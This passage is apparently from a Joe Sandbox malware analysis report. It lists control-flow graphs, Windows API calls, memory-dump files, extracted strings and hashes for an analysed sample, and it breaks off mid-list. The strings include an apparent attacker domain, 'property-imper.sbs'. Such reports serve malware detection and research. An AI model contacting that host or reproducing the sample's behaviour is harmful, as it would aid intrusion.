95->98 99 5b9500-5b9506 95->99 96->97 97->74 101 5b9590-5b9596 98->101 102 5b9508-5b950b 99->102 103 5b9525-5b9533 99->103 109 5b9598-5b959e 101->109 102->103 105 5b950d-5b9523 102->105 106 5b95aa-5b95b3 103->106 107 5b9535-5b9538 103->107 105->101 113 5b95b9-5b95bc 106->113 114 5b95b5-5b95b7 106->114 107->106 110 5b953a-5b9581 107->110 109->90 112 5b95a0-5b95a2 109->112 110->101 112->95 115 5b95a8 112->115 116 5b95be-5b95e2 113->116 117 5b95e4-5b95e6 113->117 114->109 115->90 116->101 117->101
                              APIs
                              • SysAllocString.OLEAUT32(13C511C2), ref: 005B91B6
                              • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 005B91FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: AllocBlanketProxyString
                              • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                              • API String ID: 900851650-4011188741
                              • Opcode ID: 7dd6c665074f8cd51f0e771e97ea85921a383cc7c390aa6dc28deae518a8b1ea
                              • Instruction ID: 8055a308ee75d9ff09c806319bd22a6c94f8f426722659322c7abdb388793363
                              • Opcode Fuzzy Hash: 7dd6c665074f8cd51f0e771e97ea85921a383cc7c390aa6dc28deae518a8b1ea
                              • Instruction Fuzzy Hash: 132232B19083019BE724CF24CC81BABBFA5FF95354F148A1CE6959B2C1D774E905CB92
                              Function 0058CF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 118 58cf05-58cf12 119 58cf20-58cf5c 118->119 119->119 120 58cf5e-58cfa5 call 588930 call 5b9030 119->120 125 58cfb0-58cffc 120->125 125->125 126 58cffe-58d06b 125->126 127 58d070-58d097 126->127 127->127 128 58d099-58d0aa 127->128 129 58d0cb-58d0d3 128->129 130 58d0ac-58d0b3 128->130 132 58d0eb-58d0f8 129->132 133 58d0d5-58d0d6 129->133 131 58d0c0-58d0c9 130->131 131->129 131->131 135 58d0fa-58d101 132->135 136 58d11b-58d123 132->136 134 58d0e0-58d0e9 133->134 134->132 134->134 137 58d110-58d119 135->137 138 58d13b-58d266 136->138 139 58d125-58d126 136->139 137->136 137->137 141 58d270-58d2ce 138->141 140 58d130-58d139 139->140 140->138 140->140 141->141 142 58d2d0-58d2ff 141->142 143 58d300-58d31a 142->143 143->143 144 58d31c-58d36b call 58b960 143->144 147 58d370-58d3ac 144->147 147->147 148 58d3ae-58d3c5 call 588930 call 5b9030 147->148 152 58d3ca-58d3eb 148->152 153 58d3f0-58d43c 152->153 153->153 154 58d43e-58d4ab 153->154 155 58d4b0-58d4d7 154->155 155->155 156 58d4d9-58d4ea 155->156 157 58d4fb-58d503 156->157 158 58d4ec-58d4ef 156->158 160 58d51b-58d528 157->160 161 58d505-58d506 157->161 159 58d4f0-58d4f9 158->159 159->157 159->159 163 58d52a-58d531 160->163 164 58d54b-58d557 160->164 162 58d510-58d519 161->162 162->160 162->162 167 58d540-58d549 163->167 165 58d559-58d55a 164->165 166 58d56b-58d696 164->166 168 58d560-58d569 165->168 169 58d6a0-58d6fe 166->169 167->164 167->167 168->166 168->168 169->169 170 58d700-58d72f 169->170 171 58d730-58d74a 170->171 171->171 172 58d74c-58d791 call 58b960 171->172
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$AEB601D02E944A86D7CBBD6DF28D3732$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                              • API String ID: 0-2149072787
                              • Opcode ID: 410ec9566e562f552e3040cb9a848c2998f4f05348c055f0aa8a95fb4ae4f9df
                              • Instruction ID: 1da3b1a4c595bbb26ccaaad6b5aada189cee1c81a011d5048d25c60d93075668
                              • Opcode Fuzzy Hash: 410ec9566e562f552e3040cb9a848c2998f4f05348c055f0aa8a95fb4ae4f9df
                              • Instruction Fuzzy Hash: 9C12FDB15483C18ED3358F25C495BEFBFE1ABD2304F18895CC8DA6B256D775090ACBA2
                              Function 005889A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 203 5889a0-5889b1 call 5bcb70 206 588cb3-588cbb ExitProcess 203->206 207 5889b7-5889cf call 5b6620 203->207 211 588cae call 5bdeb0 207->211 212 5889d5-5889fb 207->212 211->206 216 5889fd-5889ff 212->216 217 588a01-588bda 212->217 216->217 219 588c8a-588ca2 call 589ed0 217->219 220 588be0-588c50 217->220 219->211 225 588ca4 call 58ce80 219->225 221 588c52-588c54 220->221 222 588c56-588c88 220->222 221->222 222->219 227 588ca9 call 58b930 225->227 227->211
                              APIs
                              • ExitProcess.KERNEL32(00000000), ref: 00588CB5
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 73f29d8c06b3eea324a0435da29a4a1fc485daf18ad341be51d61e55cc25ed0e
                              • Instruction ID: c89b3aae8934bcf52ce1dd49fbbe61421310e242e8eaa9e664b8e0a89affa323
                              • Opcode Fuzzy Hash: 73f29d8c06b3eea324a0435da29a4a1fc485daf18ad341be51d61e55cc25ed0e
                              • Instruction Fuzzy Hash: B071E573B547054BC708DEBADC9236AFAD6ABC8714F09D83DA884DB390EA789C054785
                              Function 005BDF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 234 5bdf70-5bdfa2 LdrInitializeThunk
                              APIs
                              • LdrInitializeThunk.NTDLL(005BBA46,?,00000010,00000005,00000000,?,00000000,?,?,00599158,?,?,005919B4), ref: 005BDF9E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                              Function 005BB7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 5bb7e0-5bb7ff 230 5bb800-5bb83d 229->230 230->230 231 5bb83f-5bb85b RtlAllocateHeap 230->231
                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 005BB84E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 509b7b018472806ac4ea15a58c8ae0ae8d3205a0ba8dee01bd9fc4239761ef34
                              • Instruction ID: c6417a11d5bab5975000d37a65de8cd85462ae4ae993ddeb352e35314019fedd
                              • Opcode Fuzzy Hash: 509b7b018472806ac4ea15a58c8ae0ae8d3205a0ba8dee01bd9fc4239761ef34
                              • Instruction Fuzzy Hash: 6D019E33A457040BC310AF7CDCD4646BB56EFD9324F25463DE5D4873D0D531990AC295
                              Function 0058CE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 58ce80-58ceb0 CoInitializeEx
                              APIs
                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0058CE94
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: c7c7a84c2a51323474a3e373a40459598ca3eddbcd98ca97301b6a76876b3867
                              • Instruction ID: 727f07ad0e92e871d576d787e28a7058045f931623b1dc4460942090e94d8460
                              • Opcode Fuzzy Hash: c7c7a84c2a51323474a3e373a40459598ca3eddbcd98ca97301b6a76876b3867
                              • Instruction Fuzzy Hash: 7CD0A7212A06497BE114A21CEC5BF27325DC702754F440626A6A2EA2D2D951AA1AA067
                              Function 0058CEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 58ceb3-58cee2 CoInitializeSecurity
                              APIs
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0058CEC5
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: InitializeSecurity
                              • String ID:
                              • API String ID: 640775948-0
                              • Opcode ID: 13e0897bee8516b3b75f34ef81fb2cea92b58ff28e8b5148d364b23a43d2a993
                              • Instruction ID: 52a5f6db689a55af9d60a73dba68f62626b6a98fb07e302381cdfed898621a74
                              • Opcode Fuzzy Hash: 13e0897bee8516b3b75f34ef81fb2cea92b58ff28e8b5148d364b23a43d2a993
                              • Instruction Fuzzy Hash: 69D0C9303D8741BAF96446589C13F1022054715F2AF340608B322FE2D1CCD07242D508
                              Function 0058D7D3 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 265 58d7d3-58d7d8 CoUninitialize 266 58d7da-58d7e1 265->266
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: Uninitialize
                              • String ID:
                              • API String ID: 3861434553-0
                              • Opcode ID: 3b7ec3d72c9ae2a77c5e7157d3383ac518db3211eee00e7f4c2b10f39024bb43
                              • Instruction ID: 64c1c76747dac98cf07f7ee528d8371df797e86caa126fa0fe462e79efaf3032
                              • Opcode Fuzzy Hash: 3b7ec3d72c9ae2a77c5e7157d3383ac518db3211eee00e7f4c2b10f39024bb43
                              • Instruction Fuzzy Hash: 09A02437F10014445F4000F47C010DDF310D1C00377100373C31CC1400D533113501C1

                              Non-executed Functions

                              Function 005A3D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                              • API String ID: 1279760036-1524723224
                              • Opcode ID: bd1d24e0b24caa679d9c368eeee7c8795e56e644f670d84096baf3e58f48bdbf
                              • Instruction ID: e4b1abc872b70317c7a436bef9fca2cf225caa93d57378b5273910e16cd04311
                              • Opcode Fuzzy Hash: bd1d24e0b24caa679d9c368eeee7c8795e56e644f670d84096baf3e58f48bdbf
                              • Instruction Fuzzy Hash: DB2258B150C3808FD7218B68C4943AEBFE1BBD6314F184D2DE5D987392D6BA8885CB53
                              Function 005894D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                              • API String ID: 0-1787199350
                              • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction ID: 7583be8c9f8ac9e8bc548a5a6cf7a09010454c822d05f03796c1a2045ce6d023
                              • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction Fuzzy Hash: 20B1C47010C3818FD3159F2984607ABBFE1AFD7744F1849ACE8D59B392D779890ACB92
                              Function 0074DD87 Relevance: 14.1, Strings: 10, Instructions: 1563COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 76Os$;z>&$OL~g$Suwr$YU{$ZR/-$ld&o$g[$l=S$O
                              • API String ID: 0-2175548767
                              • Opcode ID: 08e5ae7bb4bdca518743a99796c743b89c4c721d7e21ae185db29043f6676ce6
                              • Instruction ID: f3c5608f7dc952c4458f4367e69cbed86cc0b003f8ba97c615be5c3da0886fc7
                              • Opcode Fuzzy Hash: 08e5ae7bb4bdca518743a99796c743b89c4c721d7e21ae185db29043f6676ce6
                              • Instruction Fuzzy Hash: 13B204F360C2049FE3046F2DEC8567AFBE9EF94720F1A893DE6C487744EA3558058696
                              Function 005898F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
